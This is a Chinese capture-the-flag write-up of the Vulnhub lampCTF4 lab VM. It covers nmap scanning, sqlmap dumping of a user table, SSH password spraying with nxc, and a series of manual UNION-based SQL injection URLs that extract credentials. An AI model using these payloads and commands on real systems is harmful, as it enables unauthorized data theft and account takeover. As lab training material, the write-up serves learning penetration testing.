首页 > 其他分享 >Vulnhub lampCTF4

Vulnhub lampCTF4

时间:2025-01-02 17:10:34浏览次数:1  
标签:title 10.133 blog -- Vulnhub 10.10 id lampCTF4

0x01:端口扫描

主机发现

nmap -sn 10.10.10.0/24

image-20250102150139626

全端口扫描

nmap --min-rate 10000 -p- 10.10.10.133

image-20250102150312498

UDP扫描

nmap -sU --top=20 10.10.10.133

image-20250102150418316

详细端口扫描

nmap -sT -sC -sV -O --min-rate 10000 -p22,25,80,631 10.10.10.133

image-20250102150619267

漏洞扫描

nmap --script=vuln -p22,25,80,631 10.10.10.133

image-20250102151222112

0x02:web渗透

再刚刚的目录枚举中得到了以下信息

image-20250102153739633

image-20250102151449777

尝试sql注入

image-20250102153810375

成功,直接sqlmap一把梭哈

sqlmap -u "http://10.10.10.133/index.html?page=blog&title=Blog&id=*" --dbs

image-20250102154107346

根据我们之前看到的db.sql内容,我们直接查看

sqlmap -u "http://10.10.10.133/index.html?page=blog&title=Blog&id=*" -D ehks -T user --dump

image-20250102154458312

我们爆破ssh

nxc ssh 10.10.10.133 -u user.txt -p pass.txt --continue-on-success

image-20250102155146893

已经拿到两个了,我们登录

image-20250102155305831

0x03:权限提升

image-20250102155347802

image-20250102155410837

0x04:总结反思

尝试手动注入

测字段

http://10.10.10.133/index.html?page=blog&title=Blog&id=1 order by 6--+

image-20250102155841275

为5段

http://10.10.10.133/index.html?page=blog&title=Blog&id=0 union select 1,2,3,4,5--

image-20250102165131275

查库名

http://10.10.10.133/index.html?page=blog&title=Blog&id=0 UNION SELECT 1,2,group_concat(schema_name),4,5 FROM information_schema.schemata--

image-20250102165338951

查表名

http://10.10.10.133/index.html?page=blog&title=Blog&id=0 UNION SELECT 1,2,group_concat(table_name),4,5 From information_schema.tables WHERE table_schema='ehks'--

image-20250102165537153

查列名

http://10.10.10.133/index.html?page=blog&title=Blog&id=0 UNION SELECT 1,2,group_concat(column_name),4,5 From information_schema.columns WHERE table_name='user' AND table_schema='ehks'--

image-20250102165701211

拉取数据

http://10.10.10.133/index.html?page=blog&title=Blog&id=0 UNION SELECT 1,2,group_concat(user_id,0x7c,user_name,0x7c,user_pass),4,5 From ehks.user--

image-20250102165822871

标签:title,10.133,blog,--,Vulnhub,10.10,id,lampCTF4
From: https://www.cnblogs.com/kelec0ka/p/18648287

相关文章

  • VULNHUB靶场-matrix-breakout-2-morpheus(1)
    1.直接把靶机拖进虚拟机中,用kali探测IP2.进入浏览器3.查看网页源代码后什么也没有后,扫描端口4.进入81端口5.进入bp爆破后爆破不到账号密码,进入kali进行爆破6.回到浏览器进入到/graffiti.php,有输入框尝试xss,存在xss漏洞 7.进行抓包,看到/graffiti.txt文件后,进......
  • Vulnhub 靶场 Chill Hack: 1
    前期准备靶机地址:https://www.vulnhub.com/entry/chill-hack-1,622/kali攻击机IP:192.168.11.128靶机IP:192.168.11.132一、信息收集1.使用nmap对目标靶机进行扫描开了21(FTP。有个note.txt文件)、22(SSH)和80端口。2.21端口匿名登陆ftp并下载下来note.txt文......
  • VulnHub-Empire_ LupinOne靶场
    1.kali虚拟机扫描端口(虚拟机与靶机均为NAT连接模式)2.登录网址3.扫描下目录,发现一个robots.txt文件4.访问下robots.txt文件5.访问下~myfiles文件6.用wfuzz进行扫描 http://ffuf-c-w/usr/share/wordlists/dirb/common.txt-u‘http://192.168.11.153/~FUZZ’7.......
  • Vulnhub靶场(driftingblues6_vh)
    1.搭建靶机官网地址:https://www.vulnhub.com/entry/driftingblues-6,672/官网下载.ova文件双击vm打开导入获取靶机IPkail终端输入arp-scan-llook一下主页2.信息收集扫描后台目录dirbhttp://192.168.131.179查看目录通过访问robots.txt,我们获得了一个/t......
  • Vulnhub靶场-Driftingblues 6靶机(至获取shell)
    靶机安装好后,照例扫描IP端口目录首页为一个图片,没有什么信息访问robots.txt,存在一个textpattern/textpattern目录,我们访问为一个登录窗口,sqlmap无法注入提示我们扫目录时添加.zip扩展名,所以我们使用gobuster来添加扩展名进行扫描扫描到了spammer.zip和spammer......
  • Vulnhub靶场(Empire-Lupin-One)
    搭建靶机;拖进来就行扫描靶机IPnmap-O192.168.47.1301.信息收集nmap-p-192.168.47.133nmap-sC-sV-p22,80192.168.47.133-oNnmap.log目录扫描gobusterdir-w字典目录-u目标gobusterdir-wzi.txt-uhttp://192.168.47.133/2.寻找薄弱点查看r......
  • Vulnhub靶场(Jangow)
    项目地址Jangow:1.0.1~VulnHub1.搭建靶机一些vm有配置问题,需要修改网卡信息启动时点击第二个按回车继续选择第二个按e进入编辑删除"recoverynomodeset"在末尾添加"quietsplashrwinit=/bin/bash"Ctrl+x启动进入如下界面编辑文件sudovim/etc/netw......
  • vulnhub靶场Empire_LupinOne
    一、部署靶机靶机设置为nat模式开启靶机直接暴露靶机ip二、信息收集扫ip访问靶机地址扫目录dirbhttp://192.168.146.155dirsearch-uhttp://192.168.146.155扫端口nmap-sS-A-T4192.168.146.155//对靶机开放的端口进行更详细的扫描nmap-sC-......
  • Vulnhub-SolidState打靶
    目录一、nmap扫描二、pop3泄露的ssh密码登录ssh,并rbash逃逸三、root权限脚本反弹shell提权四、总结一、nmap扫描nmap-sT--min-rate10000192.168.213.141 -oAnmapscan/port扫描tcp开放了那些端口,保存到nmap/port中nmap-sU --min-rate10000192.168.213.141......
  • 「玩转 Vulnhub:Kioptrix 5 靶机的渗透与解题思路」
    获取靶机地址:点击领取获取更多资料工具:点击领取信息收集主机发现首先我们要找到靶机的ip,先用kali扫一圈同网段存活的ip,再将靶机打开,然后接着再扫一遍sudo arp-scan -l端口扫描下一步是收集有关靶机上运行的服务的信息。sudo nmap -p- -A 192.168.17.129发......